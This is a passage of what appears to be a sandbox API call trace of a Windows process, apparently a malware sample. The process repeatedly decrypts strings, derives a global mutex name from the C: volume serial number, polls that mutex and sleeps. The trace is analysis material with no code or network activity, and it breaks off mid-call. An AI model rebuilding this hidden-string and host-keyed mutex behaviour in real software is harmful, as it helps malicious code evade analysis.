Flags=0x0, Size=0x90) returned 0x20f5ee8 [0124.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa273c0) returned 1 [0124.030] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0124.030] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5ee8, pdwDataLen=0x221f7e4 | out: pbData=0x20f5ee8, pdwDataLen=0x221f7e4) returned 1 [0124.030] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5ee8 | out: hHeap=0x20f0000) returned 1 [0124.030] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.030] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0124.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa273c0) returned 1 [0124.030] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0124.030] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0124.030] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1708 [0124.031] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x98 [0124.031] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0x0) returned 0x102 [0124.031] CloseHandle (hObject=0x98) returned 1 [0124.031] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.031] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1708 | out: hHeap=0x20f0000) returned 1 [0124.031] Sleep (dwMilliseconds=0x3e8) [0125.050] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1718 [0125.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa28fd8) returned 1 [0125.050] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0125.050] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f80c | out: pbData=0x20f1718, pdwDataLen=0x221f80c) returned 1 [0125.050] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0125.050] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1740 [0125.051] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14d8 [0125.051] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0125.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa28fd8) returned 1 [0125.051] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0125.051] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0125.051] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0125.051] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0125.051] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1740 | out: hHeap=0x20f0000) returned 1 [0125.051] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1718 [0125.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa28fd8) returned 1 [0125.051] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0125.051] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f840 | out: pbData=0x20f1718, pdwDataLen=0x221f840) returned 1 [0125.051] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0125.051] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14d8 [0125.051] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xd4 [0125.051] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0x0) returned 0x102 [0125.051] CloseHandle (hObject=0xd4) returned 1 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0125.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0125.051] Sleep (dwMilliseconds=0x3e8) [0126.061] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1718 [0126.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa28fd8) returned 1 [0126.061] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0126.061] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f80c | out: pbData=0x20f1718, pdwDataLen=0x221f80c) returned 1 [0126.061] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1740 [0126.061] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14d8 [0126.061] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0126.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa28fd8) returned 1 [0126.061] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0126.061] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0126.061] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0126.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0126.061] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0126.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0126.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0126.061] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0126.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1740 | out: hHeap=0x20f0000) returned 1 [0126.061] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1718 [0126.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa28fd8) returned 1 [0126.061] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0126.061] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f840 | out: pbData=0x20f1718, pdwDataLen=0x221f840) returned 1 [0126.062] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0126.062] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14d8 [0126.062] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xd4 [0126.062] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0x0) returned 0x102 [0126.062] CloseHandle (hObject=0xd4) returned 1 [0126.062] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0126.062] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0126.062] Sleep (dwMilliseconds=0x3e8) [0129.644] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1718 [0129.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa28fd8) returned 1 [0129.644] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0129.644] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f80c | out: pbData=0x20f1718, pdwDataLen=0x221f80c) returned 1 [0129.644] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0129.644] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1740 [0129.644] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14d8 [0129.644] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0129.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa28fd8) returned 1 [0129.644] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0129.644] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0129.644] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0129.644] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0129.644] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.644] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0129.644] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0129.644] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.645] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1740 | out: hHeap=0x20f0000) returned 1 [0129.645] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1718 [0129.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa28fd8) returned 1 [0129.645] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0129.645] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f840 | out: pbData=0x20f1718, pdwDataLen=0x221f840) returned 1 [0129.645] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0129.645] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14d8 [0129.645] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xd4 [0129.645] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0x0) returned 0x102 [0129.645] CloseHandle (hObject=0xd4) returned 1 [0129.645] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0129.645] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0129.645] Sleep (dwMilliseconds=0x3e8) [0131.157] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1718 [0131.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa28fd8) returned 1 [0131.157] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0131.157] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f80c | out: pbData=0x20f1718, pdwDataLen=0x221f80c) returned 1 [0131.157] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0131.157] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1740 [0131.157] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14d8 [0131.157] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0131.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa28fd8) returned 1 [0131.157] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0131.157] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0131.157] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0131.157] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0131.157] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0131.157] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0131.157] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0131.158] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1740 | out: hHeap=0x20f0000) returned 1 [0131.158] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1718 [0131.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa28fd8) returned 1 [0131.158] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0131.158] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x221f840 | out: pbData=0x20f1718, pdwDataLen=0x221f840) returned 1 [0131.158] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0131.158] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14d8 [0131.158] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xd4 [0131.158] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0x0) returned 0x102 [0131.158] CloseHandle (hObject=0xd4) returned 1 [0131.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0131.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0131.158] Sleep (dwMilliseconds=0x3e8) [0132.615] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14a0 [0132.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa27988) returned 1 [0132.615] CryptSetKeyParam (hKey=0xa27988, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0132.615] CryptDecrypt (in: hKey=0xa27988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14a0, pdwDataLen=0x221f80c | out: pbData=0x20f14a0, pdwDataLen=0x221f80c) returned 1 [0132.615] CryptDestroyKey (hKey=0xa27988) returned 1 [0132.615] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f5910 [0132.615] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f5938 [0132.615] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0132.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa27988) returned 1 [0132.615] CryptSetKeyParam (hKey=0xa27988, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0132.615] CryptDecrypt (in: hKey=0xa27988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0132.615] CryptDestroyKey (hKey=0xa27988) returned 1 [0132.615] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0132.615] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f5910, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0132.615] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5938 | out: hHeap=0x20f0000) returned 1 [0132.615] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14a0 | out: hHeap=0x20f0000) returned 1 [0132.615] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.615] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0132.616] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0132.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa27988) returned 1 [0132.616] CryptSetKeyParam (hKey=0xa27988, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0132.616] CryptDecrypt (in: hKey=0xa27988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0132.616] CryptDestroyKey (hKey=0xa27988) returned 1 [0132.616] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f5958 [0132.616] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xd8 [0132.616] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0x0) returned 0x102 [0132.616] CloseHandle (hObject=0xd8) returned 1 [0132.616] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0132.616] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5958 | out: hHeap=0x20f0000) returned 1 [0132.616] Sleep (dwMilliseconds=0x3e8) [0133.622] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0133.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa28ec8) returned 1 [0133.622] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0133.622] CryptDecrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0133.622] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.622] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0133.622] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0133.622] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0133.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa28ec8) returned 1 [0133.622] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0133.622] CryptDecrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0133.622] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.622] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0133.622] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0133.622] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0133.622] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0133.622] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0133.623] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0133.623] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0133.623] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa28ec8) returned 1 [0133.623] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0133.623] CryptDecrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0133.623] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.623] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0133.623] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x138 [0133.623] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x0) returned 0x102 [0133.623] CloseHandle (hObject=0x138) returned 1 [0133.623] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0133.623] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0133.623] Sleep (dwMilliseconds=0x3e8) [0135.121] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0135.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa2eb08) returned 1 [0135.121] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0135.121] CryptDecrypt (in: hKey=0xa2eb08, 